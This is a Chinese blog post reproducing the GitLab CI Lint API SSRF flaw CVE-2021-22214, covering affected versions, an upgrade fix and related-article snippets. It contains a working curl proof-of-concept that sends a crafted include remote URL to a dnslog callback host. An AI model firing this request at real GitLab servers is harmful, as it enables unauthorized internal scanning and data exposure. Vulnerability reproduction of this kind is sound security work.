Gitlab SSRF(CVE-2021-22214)

最新推荐文章于 2024-06-06 21:05:22 发布
最新推荐文章于 2024-06-06 21:05:22 发布
阅读量323 收藏 7
点赞数 7
文章标签: gitlab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135992021
版权
文章讲述了GitLab中的一项安全漏洞,攻击者通过构造特殊的HTTP请求利用CI/CLintAPI的remote选项获取敏感数据或执行恶意请求。漏洞存在于13.10.5及以上版本,建议用户及时升级到最新版本以修复此问题。
摘要由CSDN通过智能技术生成

漏洞描述:

GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。

Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档,其include操作支持remote选项,用于获取远端的yaml。因此在此处将remote参数设置为本地回环地址,同时由于后端会检查最后扩展名,加上?test.yaml 即可绕过。

当13.10.5 > GitLab >= 10.5、13.11.5 > GitLab >= 13.11、13.12.2 > GitLab >= 13.12时,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.获取dnslog地址

http://www.dnslog.cn/

3.curl检测

curl -k -s --show-error -H 'Content-Type: application/json' http://攻击ip:端口/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content":"include:\n remote: http://dnslog地址/api/v1/targets/?test.yml"}'

4.查看dnslog回显

借此漏洞,攻击者可以获取正常用户访问不到的信息,并对内网进行扫描,攻击。

修复建议:

1.升级版本。

慕筱蚺
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Gitlab SSRF 漏洞复现 CVE-2021-22214
afei001
08-03 1187
GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。当对内部网络的webhook的请求被启用时,GitLab CE/EE中一个服务器端请求伪造漏洞SSRF(影响从10.5开始的所有版本)就有可能被未经身份验证的攻击者利用,即使是在注册受限的GitLab实例上。...
追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)
Ms08067安全实验室
06-22 6063
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web安全攻防合伙人) GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来...
gitlab SSRF(CVE-2021-22214
YouthBelief的博客
11-11 1762
gitlab SSRF CVE-2021-22214gitlab SSRF(CVE-2021-22214)0x01 漏洞描述0x02 影响范围0x03 漏洞复现curl检测脚本检测0x04 漏洞修复 gitlab SSRF(CVE-2021-22214) 0x01 漏洞描述 GitLab存在前台未授权SSRF漏洞。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。 0x0
案例研究-SSRF+DNS rebinding【$5000】
最新发布
the_biggest_baby的博客
06-06 1010
分享一篇 HackerOne 上一篇赏金 5000$ 的 DNS rebinding(重新绑定)绕过 ssrf 的报告的学习记录。Hacking for fun!
CVE-2021-22214 Gitlab_SSRF
weixin_45945976的博客
12-15 2700
CVE-2021-22214 Gitlab_SSRF 漏洞复现: 目标地址:https://gitlab.xxx.xxx/users/sign_in POC curl -s --show-error -H 'Content-Type: application/json' https://gitlab.xxx.xxx/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://fbnw
GitLab SSRF
自强不息
06-22 575
只要春天不死,就有迎春的花朵年年岁岁开放,生命讲涅磐,生生不息,并会以另一种形式永存。
(CVE-2021-22214)Gitlab SSRF漏洞 漏洞复现
鸣蜩十四的博客
08-09 2558
简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。 漏洞描述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档,其include 操作支持remote选项,用于获取远端的yaml。因此在此处将
[CVE-2021-22214]Gitlab SSRF 未授权访问漏洞
whoami
04-13 3339
一、影响版本 13.10.5 > GitLab >= 10.5 13.11.5 > GitLab >= 13.11 13.12.2 > GitLab >= 13.12 二、漏洞POC curl -s --show-error -H 'Content-Type: application/json' http://127.0.0.1:55001/api/v4/ci/lint --data '{ "include_merged_yaml": true, "con
生命在于研究——CVE-2021-22214记录
易水哲的博客
09-28 399
GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。
检测通过“ proxylogon”组漏洞(CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-26855
03-12
2021年,四个零日漏洞(也被统称为 Hafnium 攻击)被发现,其中 CVE-2021-26855 是最重要的一个,它涉及到 Exchange Server 上的一个服务器端请求伪造(SSRF)漏洞,可以通过 WebDAV 接口来触发。 **漏洞原理** ...
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
CVE-2021-26855:CVE-2021-26855 exp
03-08
CVE-2021-26855 CVE-2021-26855 ssrf简单利用golang练习影响版本Exchange Server 2013小于CU23 Exchange Server 2016小于CU18 Exchange Server 2019小于CU7利用条件该突破性常规的交换漏洞,此突破并没有一个可登录...
CVE-2021-26855:代理登录链SSRF(CVE-2021-26855)的PoC由testanull写入文件,由github审查
03-12
CVE-2021-26855 代理登录链SSRF(CVE-2021-26855)的PoC由testanull写入文件,由github审查为什么github会删除此漏洞利用程序,因为它违反了可接受的使用策略-但是其他许多概念验证漏洞利用和框架都可以吗?...
CVE-2021-26855-PoC:CVE-2021-26855的PoC攻击代码
03-12
CVE-2021-26855 SSRF简单地使用Golang练习受影响的版本 Exchange Server 2013 is less than CU23 Exchange Server 2016 is less than CU18 Exchange Server 2019 is less than CU7 使用条件 此漏洞与以前的交换漏洞...
Gitlab 任意文件读取漏洞(CVE-2016-9086)以及gitlab SSRF to redis
公众号shadow sock7
12-16 1207
使用vulhub的环境: https://github.com/vulhub/vulhub/tree/master/gitlab/CVE-2016-9086 任意文件读取漏洞(CVE-2016-9086): GitLab CE/EEversions 8.9, 8.10, 8.11, 8.12, and 8.13 任意用户authentication_token泄露漏洞: Gitlab CE/EE versions 8.10.3-8.10.5 docker起来之后是这样: 新建项目的时候有一个从Gitl
Log4j2漏洞复现(CVE-2021-44228)
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
CVE-2021-22214
08-09
CVE-2021-22214是一个与GitLab相关的SSRF漏洞。该漏洞允许攻击者通过构造特定的请求,在GitLab中实现服务器端请求伪造。通过发送恶意的请求,攻击者可以执行未经授权的操作,可能导致敏感信息泄露或系统受到攻击。 该漏洞的影响范围包括受影响的GitLab版本。您提供的引用中包含了一些关于漏洞复现的POC(Proof of Concept)示例代码,用于验证漏洞存在性。这些示例代码展示了如何利用该漏洞进行攻击。 为了修复该漏洞,用户应及时更新受影响的GitLab版本到修复补丁发布的版本。此外,还可以采取其他安全措施,如限制对GitLab API的访问权限,以减少潜在的攻击风险。 请注意,漏洞利用和攻击是违法行为,请确保在合法授权和法律框架内进行任何安全研究和测试活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值